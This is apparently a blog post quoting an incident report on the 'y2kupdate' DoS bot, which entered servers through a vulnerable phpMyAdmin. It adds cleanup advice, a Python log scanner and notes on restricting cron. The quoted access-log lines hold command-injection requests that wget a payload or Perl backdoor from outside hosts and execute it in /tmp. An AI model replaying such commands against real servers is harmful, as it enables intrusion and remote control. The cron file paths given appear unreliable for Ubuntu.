A write-up about y2kupdate that I saw online; I suspect my own Ubuntu server has been hacked..

y2kupdate denial of service vulnerability

I am posting here to warn others about y2kupdate.

I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.

The entry point to install the software on the Linux servers was a vulnerability in an out of date version of phpMyAdmin.

The apache access_log entry which shows the initial infection taking place is shown below:

GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck

An analysis of the last line of the above log entry reveals:

1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid directory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid

The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends its whole time pushing out DoS packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.

The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.

The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.

It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.

Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.

Additionally there appears to be a second class of application that can exploit the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.

An Apache log entry which shows this type of backdoor exploit is shown below:

GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt

For more information on these vulnerabilities please visit: http://www.securityfocus.com/infocus/1871
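As an added example (not part of the quoted post or the blog author's text), the following Python detector applies the post's reading of the two access_log entries to constructed sample lines: it URL-decodes the `c=` parameter, splits the command chain on `;`, and flags the "cd into a temp directory, fetch with wget/curl/lwp-download, then execute" pattern. The sample log lines are constructed from the requests quoted above; the client IPs, timestamps and status codes are made up.

```python
import re
from urllib.parse import unquote_plus

DOWNLOADERS = {"wget", "curl", "lwp-download"}      # the three fetchers the post names
DROP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")         # the three drop locations the post names
INTERPRETERS = {"perl", "sh", "bash", "python"}

# Constructed sample access_log lines modelled on the requests quoted in the post.
SAMPLE_LOG = """\
1.2.3.4 - - [01/Jan/2008:10:00:00 +0000] "GET /admin/config/config.inc.php?c=uname%20-a HTTP/1.1" 200 512
1.2.3.4 - - [01/Jan/2008:10:00:05 +0000] "GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 0
5.6.7.8 - - [01/Jan/2008:11:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
5.6.7.8 - - [01/Jan/2008:11:00:01 +0000] "GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+)\?(?P<query>\S+) HTTP/')

def extract_command(line):
    """Return the URL-decoded value of the c= parameter, or None if the line has none."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    for pair in m.group("query").split("&"):
        key, _, value = pair.partition("=")
        if key == "c":
            return unquote_plus(value)   # handles both %20 and + encodings seen in the post
    return None

def classify(command):
    """List the stages of a decoded command chain that match the post's dropper pattern."""
    findings, fetched = [], False
    for step in (s.strip() for s in command.split(";")):
        words = step.split()
        if not words:
            continue
        prog = words[0]
        if prog == "cd" and len(words) > 1 and words[1].startswith(DROP_DIRS):
            findings.append(f"cd into drop directory {words[1]}")
        elif prog == "cd" and len(words) > 1 and words[1].startswith("."):
            findings.append(f"cd into hidden directory {words[1]}")
        elif prog in DOWNLOADERS:
            fetched = True
            findings.append(f"{prog} fetch: {' '.join(words[1:])}")
        elif fetched and (prog.startswith("./") or prog in INTERPRETERS):
            findings.append(f"executes fetched payload: {step}")
    return findings

def scan_log(text):
    """Return (line_no, decoded_command, findings) for every line carrying a c= parameter."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = extract_command(line)
        if cmd is not None:
            results.append((n, cmd, classify(cmd)))
    return results
```

A line whose findings include an "executes fetched payload" entry is the fetch-then-run chain the post describes; the first sample line (a bare `uname -a` probe) decodes but yields no findings.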

So the infection works through www-data (Apache's user): it sets up a cron job that runs something under /tmp every minute..
The fix is to stop Apache from running cron.

Looking further, I found how to disallow cron for a particular user:

Like root, ordinary users can also use cron to run programs repeatedly. Tasks to be executed are submitted to cron with the crontab command. root controls who is allowed to use the crontab command through the file /var/adm/cron/cron.allow. If a user's name appears in cron.allow, that user may use crontab. If cron.allow does not exist, the system checks /var/adm/cron/cron.deny to decide whether the user is denied access. If both files exist, cron.allow takes precedence. If neither file exists, only root can submit tasks. If cron.deny is an empty file, all users can use crontab.
